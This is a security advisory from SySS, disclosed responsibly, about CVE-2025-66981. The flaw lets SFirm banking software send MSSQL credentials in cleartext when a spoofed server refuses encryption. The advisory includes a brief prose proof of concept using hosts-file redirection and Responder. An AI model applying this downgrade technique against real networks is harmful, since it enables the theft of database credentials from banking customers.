-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Advisory ID: SYSS-2025-055 Product: SFirm Manufacturer: Star Finanz-Software Entwicklung und Vertriebs GmbH Affected Version(s): Version 4 Patch 25.08 Build 8427 Tested Version(s): Version 4 Patch 25.08 Build 8427 Vulnerability Type: Insecure Transmission of Credentials (CWE-319), Selection of Less-Secure Algorithm During Negotiation (CWE-757) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2025-09-08 Solution Date: 2025-11-12 Public Disclosure: 2025-12-15 CVE Reference: CVE-2025-66981 Author of Advisory: Thomas Markloff, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: SFirm is a banking software provided by Star Finanz-Software Entwicklung und Vertriebs GmbH for corporate customers and self-employed individuals who require more professional financial management than standard online banking can offer. When connecting to an MSSQL database, the login details (username and password) are transmitted unencrypted if the other side does not support encryption or if encryption is not enforced. This allows attackers on the same network (e.g., via man-in-the-middle attack or packet sniffing) to intercept the login details in cleartext. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Through DNS spoofing, an attacker can redirect a client’s connection attempt to a malicious MSSQL server. If the spoofed server refuses encryption, the client falls back to an unencrypted connection and transmits the MSSQL credentials (username and password) in cleartext. This enables an attacker to capture valid database credentials and potentially gain unauthorized access to the legitimate system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. On the client machine, the file "C:\Windows\System32\drivers\etc\hosts" is modified so that the DNS name of the legitimate MSSQL server resolves to the attacker's IP address. Alternatively, an attacker could use DNS spoofing to redirect the client's request. 2. On the attacker's system, a service like Responder is started that accepts incoming MSSQL requests and refuses encryption. 3. The victim launches the SFirm 4 application, which attempts to connect to the MSSQL server using the spoofed address. 4. Since the malicious server does not offer encryption, the client falls back to cleartext communication and transmits the MSSQL credentials (username and password) without protection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update SFirm 4 to patch release 4/25.10 or newer. More information: https://www.sfirm.de/sfirm/neu-in-sfirm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-09-08: Vulnerability discovered 2025-09-08: Vulnerability reported to manufacturer 2025-09-09: Confirm receipt of the vulnerability 2025-09-29 – 2025-11-10: Consultation and cooperation with the manufacturer 2025-11-12: Fix of vulnerability with patch release 4/25.10 2025-12-15: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for SFirm https://www.sfirm.de/sfirm/ [2] SySS Security Advisory SYSS-2025-055 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-055.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thomas Markloff of SySS GmbH. E-Mail: thomas.markloff@syss.de Public Key https://www.syss.de/fileadmin/dokumente/PGPKeys/Thomas_Markloff.asc Key ID: 0xD3E076350BF2EC0E Key Fingerprint: 5FD6 EA37 B546 1BE8 EC5C A6DC D3E0 7635 0BF2 EC0E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEX9bqN7VGG+jsXKbc0+B2NQvy7A4FAmlg0YcACgkQ0+B2NQvy 7A5yiA//SSvpaslByBUPuhADAiN8uWJ2Pabis4ne4tFzFi20RLZ8vTYfZThgyVsF fuMoKZ9SHQ/oBR4ZSgwfoM2y8PHSX4CIsDrFOhHp1hxVUDfsb5VO6bqAZQO8Xkmi ozH5144pXlKqoFGM/eIF6CaCInHs2CjWwsYuY3puCzmRN2SWWZNW0Ad7oeGjnjKv TK0f0fh1WBZWxVlyocYXtISGqX+Wg5b0envRrKyNgx2nFL3UwFyhBRyaf06/v9Oh BVEMQ6OrGtVoaij8B+8Z+BjjtkEi3u9rOcybD+XyhG07ez1f83Gzh/14J2rnGKVR xYuP75u7rdxNmpbFj5+IRwjaWRY3aVBLCVFq7YjrdkTln/NgvlaQfAKqoL8KRQR6 6y983zbcLFRfH3wsqUr/3l2VCGkDA8JpyuyC+1M4z6JkNXN2wOQyxj90a8R/Ukxg VlH+dDgocOvwP9b9cT7EMwtZuCHM1Sdb2eOZCeD15/8VrbfhzXw7s0hx/84DWQwf OJaBEbYLslHD7au+c5/1OWtD5kJKX+H7G54ccEnJTip8Ok+meHL2WayKFyMbgMnH dPxEzFPFLJFlqF3pPMtheoiJTmJZObAnfS0+jIYJRpirEtIqR1svI2Z2wVWr+Slx WD/gHtyUT6DT7wOB2J551qSxaXfA4RDFQ0so73pYH2M0ITHNlfI= =whqY -----END PGP SIGNATURE-----